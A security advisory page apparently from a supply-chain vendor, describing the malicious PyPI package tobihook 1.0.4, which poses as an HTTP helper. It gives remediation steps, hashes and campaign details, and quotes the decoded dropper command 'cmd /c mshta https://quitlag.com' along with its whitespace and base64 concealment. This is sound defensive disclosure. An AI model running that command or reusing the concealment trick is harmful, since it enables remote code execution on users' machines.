Which versions of tobihook are malicious?

The following PyPI versions of tobihook are flagged malicious: 1.0.4. Treat any of these as compromised.

How do I remediate tobihook if I installed it?

Remove tobihook from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is tobihook part of a known attack campaign?

Yes — tobihook is associated with the IN-MAL-2026-006881, 2026-06-tobihook campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect tobihook in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking tobihook and packages like it before any post-install script runs.

Malicious package

tobihookPyPI

Malicious code in tobihook (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5995

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall tobihook

What this malware does

The package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/init.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/init.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host.

Code contains lightly obfuscated commands executing remote scripts using mshta utility. The code does not contain any different functionality and the target URL is already flagged as potentially dangerous.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-tobihook

Reasons (based on the campaign):

Downloads and executes a remote malicious script.
tool:mshta
obfuscation

Malicious versions

1 flagged

1.0.4

Indicators of compromise (SHA-256)

2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb

052494dbc6267dbb289d7f0459188ecce627e3c3eb1d7a8892795003ff8bff53

Frequently asked questions

No. tobihook on PyPI has been identified as a malicious package (version 1.0.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0068812026-06-tobihook

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · analyst

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection